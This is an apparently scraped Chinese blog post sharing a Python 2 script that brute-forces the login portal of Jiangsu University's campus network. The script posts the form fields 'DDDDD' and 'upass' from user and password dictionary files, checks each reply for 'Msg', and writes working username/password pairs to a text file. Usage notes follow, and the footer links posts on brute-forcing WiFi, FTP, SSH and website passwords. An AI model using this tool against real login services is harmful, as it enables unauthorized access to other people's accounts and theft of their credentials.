2. 程式人生 > >基於Python的江蘇大學校園網暴力破解

基於Python的江蘇大學校園網暴力破解

阿新 發佈:2019-01-23

Python是近幾年比較流行的解釋型語言。Python是純粹的自由軟體,原始碼和直譯器CPython遵循GPL的協議。最近有在學習Python,作為Python的入門的新手拿學校的校園網登陸練練手。

總體的設計思路:

1.模擬瀏覽器的器開啟登陸網頁

2.構造登陸表單

表單選項:使用者名稱 "DDDDD",密碼"upass",空選項“0KKey”

3.構造字典,字典構造工具比較多,大家可以自行選擇

4.依據字典嘗試登陸,對返回值進行判斷

4如果登陸成功,則.將正確的使用者名稱和密碼存入檔案

一下是原始碼部分:

__author__ = 'qianqiangV'
#coding:utf-8
import sys
import os
import urllib2
import urllib
import getopt
def get_opt():
	user=''
	password=''
	try:
		opts,args=getopt.getopt(sys.argv[1:],"hu:p:")
		for opt,value in opts:
			if opt=="-u":
				if value!=None:
					user=value
			elif opt=="-p":
				if value!=None:
					password=value
		return [user,password]
	except getopt.GetoptError:
		print 'error'
def crack_login(user,password):
	url='http://192.168.100.83/0.htm'
	header={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0'}
	form={'DDDDD':user,'upass':password,'0MKKey':''}
	form2=urllib.urlencode(form)
	request=urllib2.Request(headers=header,url=url,data=form2)
	response=urllib2.urlopen(request)
	html=response.read()
	return html.find('Msg')<0
def crack(user_file,pass_file):
	wuser_pass=open('user_pass.txt','w')
	if user_file.find('.txt')>0:
		try:
			userfile=open(user_file,'r')
		except IOError,e:
			print 'IOerror',e
		else:
			for eachuser in userfile:
				eachuser=eachuser.strip()
				print 'try'+' '+eachuser+' '+pass_file
				if crack_login(eachuser,pass_file):
					wuser_pass.writelines(eachuser+' '+pass_file+os.linesep)
				if pass_file.find('.txt')>0:
					try:
						passfile=open(pass_file,'r')
					except IOError,e:
						print 'IOError',e
					else:
						for eachpass in passfile:
							eachpass=eachpass.strip()
							print 'try'+' '+eachuser+' '+eachpass
							if crack_login(eachuser,eachpass):
								wuser_pass.writelines(eachuser+' '+eachpass+os.linesep)
						passfile.close()
			userfile.close()
	else:
		print 'try'+' '+user_file+' '+pass_file
		if crack_login(user_file,pass_file):
			wuser_pass.writelines(user_file+' '+pass_file+os.linesep)
		if pass_file.find('.txt')>0:
					try:
						passfile=open(pass_file,'r')
					except IOError,e:
						print 'IOError',e
					else:
						for eachpass in passfile:
							eachpass=eachpass.strip()
							print 'try'+' '+user_file+' '+eachpass.strip()
							if crack_login(user_file,eachpass):
								wuser_pass.writelines(user_file+' '+eachpass+os.linesep)
						passfile.close()
def main():
	user_pass=get_opt()
	print user_pass[0],user_pass[1]
	crack(user_pass[0],user_pass[1])
main()

執行程式:

使用者字典:user.txt

密碼字典:pass.txt

-u:選項後面可以跟使用者名稱或者使用者字典

-p:選項後面可以跟密碼或者密碼字典

程式會將傳入的引數都進行嘗試

使用者字典:

密碼字典:

在使用者字典和密碼字典放入了一個正確的使用者名稱和密碼

執行中:


執行結果:將正確的使用者名稱和密碼寫入到.txt中


暴力破解的相關原理,可以檢視我在前面一片文章寫的關於hydra的使用

相關推薦

基於Python江蘇大學校園網暴力破解

Python是近幾年比較流行的解釋型語言。Python是純粹的自由軟體,原始碼和直譯器CPython遵循GPL的協議。最近有在學習Python,作為Python的入門的新手拿學校的校園網登陸練練手。 總體的設計思路: 1.模擬瀏覽器的器開啟登陸網頁 2.構造登陸表單 表單選

Python黑科技:暴力破解,你的密碼真的安全麼?

之前更新了不少文章,大概也瞭解到了大家都喜歡什麼樣的東西,比如像黑客,爬蟲,web開發,可能都是大家比較喜歡的。 那麼今天,我給大家帶來一個Python的暴力破解加密的壓縮檔案的方法(是不是壓縮檔案不重要)。 另外你會不會Python也不重要 首先,我們得說一下,如何開啟一個壓縮檔案,如

Python之FTP伺服器暴力破解(注入木馬)

密碼字典下載:[email protected]:qq_21792169/dictionary.gitftp.py#!/usr/bin/python # -*- coding: utf-8 -*- import ftplib import optparse impo

基於python+splinter工具模擬校園網自動登入+密碼破解

工具: python + splinter 技術目標: 1、利用python的splinter package,在登入介面中自動完成頁面操作,提取elements,      post elements.完成authentication;從而利用python指令碼完成自動

Python】HackBack(獲取暴力破解服務器密碼的IP來源)

split time get main ports import var api pre 1、前言 又在0x00sec上翻到好東東。 https://0x00sec.org/t/python-hackback-updated/882 帖子裏的腳本會得到那些暴力服務器密碼失敗

Python指令碼暴力破解FTP口令

目錄 判斷FTP伺服器是否允許匿名登入 暴力破解FTP口令 列出FTP目錄內的網頁檔案 綜合 環境:Windows python2.7.15 ftplib模組是python下用於ftp服務的模組 。 判斷FTP伺服器是否允許匿名登入 以下程

Python指令碼暴力破解SSH口令以及構建僵屍網路(pxssh)

目錄 暴力破解SSH口令 SSH遠端執行命令 構建僵屍網路 環境:Kali Linux  python 2.7.13 暴力破解SSH口令 Pxssh是pexpect庫的ssh專用指令碼,他能用預先寫好的 login()、logout() 和 pro

破解密碼很難?利用Python自動編寫暴力破解字典,黑客必學技能!

  Python是一款非常強大的語言。用於測試時它非常有效,因此Python越來越受到歡迎。 因此,在此次教程中我將聊一聊如何在Python中生成字典,並將它用於任何你想要的用途。   前提要求 如果你用virtualenv搭建Python開發環境

GJCTF模擬題之python暴力破解網站管理員密碼

題目地址:http://www.czlgjbbq.top/GJCTF/brute.php php原始碼: <?php error_reporting(0); session_start(); if(empty($_COOKIE['f14g']) || empty($_SES

python爬蟲自動登入武漢大學校園網

#coding:utf-8 __author__ = 'zy' import urllib2 import cookielib import urllib import re import sys '''模擬登入''' PostUrl = "http://202.114.64.105:

python實戰:暴力破解wifi密碼

工具: python3.0,pycharm python庫:pywifi,time 思路: 匯入模組 抓取網絡卡介面 斷開所有wifi 讀取密碼本 測試連線 設定睡眠時間 流程: 1.匯入模組 import pywifi from pywifi import c

如何用Python寫一個暴力破解加密壓縮包的程式

有些時候加密rar軟體經常會忘了密碼,但記得密碼的大概,於是乎用Python寫個程式來暴力破解吧: 首先要搞清楚如何用命令列來解壓縮,經研究,rar軟體解壓是用的unrar.exe,將這個程式拷貝到C:\windows,然後進入加密軟體包所在的資料夾,用命令列執行 下面的命

[hashcat]基於字典和暴力破解常識找到rar3-hp的壓縮包密碼

1.使用rar2john找到md5 2.基於字典 hashcat -a 0 -m 0 /root/Desktop/md5.txt /usr/share/wordlists/weakpass.txt   3.基於暴力的6-8位混合小寫字母和數字: hashcat -a 3 -m 0 /roo

破解密碼很難? 利用Python自動編寫暴力破解字典, 黑客必學技能!

Python是一款非常強大的語言。用於測試時它非常有效,因此Python越來越受到歡迎。 因此,在此次教程中我將聊一聊如何在Python中生成字典,並將它用於任何你想要的用途。 前提要求 如果你用virtualenv搭建Python開發環境,請確保已經安裝了it

python程式設計】網站密碼暴力破解程式碼

1、pass1.txt需要從相關網站上下載,即密碼字典 2、使用python 此程式執行後列印密碼即可 #!/usr/bin/python #-*-coding:utf-8-*- import sys import httplib,urllib;  #載入模組 def P

python指令碼生成密碼字典,暴力破解伺服器root密碼

大概在一年多前,我想做一個用於暴力破解md5加密的程式,原理是預先通過組合字串,算出對應的md5加密,然後根據md5加密串來查詢對應的字串,這種方法從理論上是可行的,實際操作起來有一些困難。     有的時候,一旦自己產生了一個想法,就自然有非常大的動力去努

Python暴力破解人家網站,獲取VIP賬戶密碼!

今天極度無聊,不知道爬些什麼,就在各大網站逛啊逛啊,無意中逛到了某小網站,該網站竟然還設定了各種Vip才能使用的特權。我看到了瞬間就怒火中燒,都是些小功能,竟然還要各種充錢。   在這及不理智的情況下,我暴力破解了人家網站。具體思路與步驟如下: 爆破思路與分析: 1

Python實現FTP暴力破解

最近在看《Violent Python》,記錄一些程式碼實現。 0x00 FTP暴力破解之PTYHON實現 需使用ftplib庫,書中採用單執行緒,這裡我使用了多執行緒完成,匿名登入的問題暫時沒有找機子試,如有問題可以探討~ 0x01 程式碼實現 import optpa

Python暴力破解的收集

1.  破解ftp: import ftplib def bruteLogin(hostname,passwdFile): pF=open(passwdFile,'r') for line in pF.readlines(): userName=line.spli

黑龍江大學 校園網 師生服務 身份驗證 查成績 查績點等 API 以及示例程式 (Python 驗證碼自動識別)

特性:python 圖片降噪之後 利用 pytesseract, tesseract-ocr 自動識別驗證碼 不斷更新各種 API 應有盡有 點x校園網:) 地址: htt